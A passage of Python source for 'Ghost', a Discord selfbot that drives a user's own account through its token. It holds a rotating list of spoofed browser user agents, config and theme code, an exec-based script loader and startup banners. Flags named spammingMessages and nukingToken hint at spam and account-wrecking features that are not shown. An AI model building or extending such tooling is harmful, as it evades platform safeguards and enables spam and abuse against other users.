Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3057.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 TC2", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2531.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2264.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2714.0 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1864.6 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Avast/70.0.917.102", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1615.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3608.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2427.7 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.61 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.104 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.45 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.45", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.102 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2419.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.114 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64; 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/17.0.1410.63 Safari/537.31", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2583.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/536.36 (KHTML, like Gecko) Chrome/67.2.3.4 Safari/536.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 EdgA/41.0.0.1662", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1"]
userAgent = random.choice(userAgents)
return userAgent
def avatarUrl(id, avatar):
url = ""
if not str(avatar).startswith("http"):
if str(avatar).startswith("a_"):
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.gif?size=1024"
else:
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.png?size=1024"
return url
else:
return avatar
def iconUrl(id, icon):
url = ""
if str(icon).startswith("a_"):
url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.gif?size=1024"
else:
url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.png?size=1024"
return icon
def resource_path(relative_path):
# try:
# base_path = sys._MEIPASS
# except Exception:
# base_path = os.path.abspath(".")
# return os.path.join(base_path, relative_path)
return relative_path
def get_friends(token):
request = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token})
json = request.json()
friends = []
for item in json:
if item["type"] == 1:
friends.append(item["user"])
return friends
async def constant_input(bot):
while True:
message = input().lower()
cmd = ""
try:
msgs = bot.cached_messages
ctx = await bot.get_context(msgs[0])
except IndexError:
print("Couldnt get context from cached message. Send a message in discord and try again.")
else:
consoleCommand = False
for command in bot.commands:
if command.name == message:
for alias in command.aliases:
if "consolecommand" in alias.lower():
consoleCommand = True
cmd = alias
break
if consoleCommand:
await ctx.invoke(bot.get_command(cmd))
else:
print("That command can't be ran in the console.")
class Config():
def __init__(self):
self.json = json.load(open("config.json"))
self.token = self.json["token"]
self.prefix = self.json["prefix"]
self.deleteTimeout = self.json["delete_timeout"]
self.theme = self.json["theme"]
self.giveawayJoinDelay = self.json["giveaway_join_delay"]
def getConfig():
return json.load(open("config.json"))
def saveConfig(data):
return json.dump(data, open("config.json", "w"), indent=4, sort_keys=False)
def changeToken(newToken):
global __token__
__token__ = newToken
cfg = Config.getConfig()
cfg["token"] = newToken
Config.saveConfig(cfg)
def changePrefix(newPrefix):
global __prefix__
__prefix__ = newPrefix
Ghost.command_prefix = newPrefix
cfg = Config.getConfig()
cfg["prefix"] = newPrefix
Config.saveConfig(cfg)
def changeDeleteTimeout(newDeleteTimeout):
global __deletetimeout__
newDeleteTimeout = int(newDeleteTimeout)
__deletetimeout__ = newDeleteTimeout
cfg = Config.getConfig()
cfg["delete_timeout"] = newDeleteTimeout
Config.saveConfig(cfg)
def changeGiveawayJoinDelay(newJoinDelay):
global __giveawayjoindelay__
newJoinDelay = int(newJoinDelay)
__giveawayjoindelay__ = newJoinDelay
cfg = Config.getConfig()
cfg["giveaway_join_delay"] = newJoinDelay
Config.saveConfig(cfg)
def changeTheme(newTheme):
global __embedtitle__, __embedcolour__, __embedfooter__, __embedemoji__, __embedimage__, __embedfooterimage__, __embedcolourraw__, __theme__, __embedlargeimage__
__embedtitle__ = json.load(open(f"themes/{newTheme}.json"))["embedtitle"]
__embedcolour__ = int(json.load(open(f"themes/{newTheme}.json"))["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = json.load(open(f"themes/{newTheme}.json"))["embedcolour"]
__embedfooter__ = json.load(open(f"themes/{newTheme}.json"))["embedfooter"]
__embedemoji__ = json.load(open(f"themes/{newTheme}.json"))["globalemoji"]
__embedimage__ = json.load(open(f"themes/{newTheme}.json"))["embedimage"]
__embedfooterimage__ = json.load(open(f"themes/{newTheme}.json"))["embedfooterimage"]
__embedlargeimage__ = json.load(open(f"themes/{newTheme}.json"))["embedlargeimage"]
__theme__ = newTheme
cfg = Config.getConfig()
cfg["theme"] = newTheme
Config.saveConfig(cfg)
if sys.platform == "win32":
ccolourred, ccolourgreen, ccolourblue = hex_to_rgb(__consolecolour__)
fg.consoleColour = Style(RgbFg(ccolourred, ccolourgreen, ccolourblue))
fg.cRed = Style(RgbFg(255, 81, 69))
fg.cOrange = Style(RgbFg(255, 165, 69))
fg.cYellow = Style(RgbFg(255, 255, 69))
fg.cGreen = Style(RgbFg(35, 222, 57))
fg.cBlue = Style(RgbFg(69, 119, 255))
fg.cPurple = Style(RgbFg(177, 69, 255))
fg.cPink = Style(RgbFg(255, 69, 212))
fg.cGrey = Style(RgbFg(207, 207, 207))
fg.cBrown = Style(RgbFg(199, 100, 58))
fg.cBlack = Style(RgbFg(0, 0, 0))
fg.cWhite = Style(RgbFg(255, 255, 255))
elif sys.platform == "linux" or sys.platform == "darwin":
fg.consoleColour = colorama.Fore.BLUE
fg.cRed = colorama.Fore.RED
fg.cOrange = colorama.Fore.YELLOW
fg.cYellow = colorama.Fore.YELLOW
fg.cGreen = colorama.Fore.GREEN
fg.cBlue = colorama.Fore.BLUE
fg.cPurple = colorama.Fore.MAGENTA
fg.cPink = colorama.Fore.MAGENTA
fg.cGrey = colorama.Fore.WHITE
fg.cBlack = colorama.Fore.BLACK
fg.cWhite = colorama.Fore.RESET
if is_windows():
os.system("cls")
os.system(f"title Ghost")
elif is_linux():
os.system("clear")
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
Ghost = commands.Bot(command_prefix=__prefix__, self_bot=True, status=discord.Status.try_value(status))
Ghost.remove_command('help')
Ghost.launch_time = datetime.utcnow()
botStartTime = time.time()
giveawayBots = []
for index in GIVEAWAYBOTS:
giveawayBots.append(int(index))
version = "2.3.9"
cycleStatusText = ""
cycleStatus = False
discordServer = "discord.gg/aWTpaJV4cT"
uwuifyEnabled = False
channelBlankChar = ""
spammingMessages = False
rickRollEnabled = False
nukingToken = False
consoleMode = __consolemode__
consoleModes = ["new", "new2", "new3", "new4", "bear", "old", "react", "rise", "nighty", "rainbow"]
scriptsList = []
afkMode = CONFIG["afkmode"]["enabled"]
def include(filename):
global scriptsList
if os.path.exists(filename):
scriptsList.append(filename)
exec(codecs.open(filename, encoding="utf-8").read(), globals(), locals())
# hideText = "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"
if not __custommotd__:
motd = "Developed by Benny | Now maintained by timof121"
else:
motd = __custommotdtext__
@Ghost.event
async def on_connect():
if str(sounddevice.query_devices()) != "":
try:
pygame.mixer.init()
except:
pass
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title Ghost [{version}] [{Ghost.user}]")
if is_linux():
os.system("clear")
def constant_input2(bot):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(constant_input(bot))
loop.close()
threading.Thread(target=constant_input2, args=(Ghost,)).start()
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {Ghost.user} | Prefix: {Ghost.command_prefix} | Servers: {len(Ghost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
os.system("cls")
if is_linux():
os.system("resize -s 24 90")
os.system("clear")
print("")
print(f" {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}███████{fg.cBlue}╗{fg.cWhite}████████{fg.cBlue}╗")
print(f" {fg.cWhite}██{fg.cBlue}╔════╝ {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔═══{fg.cWhite}██{fg.cBlue}╗{fg.cWhite}██{fg.cBlue}╔════╝╚══{fg.cWhite}██{fg.cBlue}╔══╝")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}███{fg.cBlue}╗{fg.cWhite}███████{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}███████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔══{fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚════{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}███████{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {Ghost.user} [{len(Ghost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {Ghost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
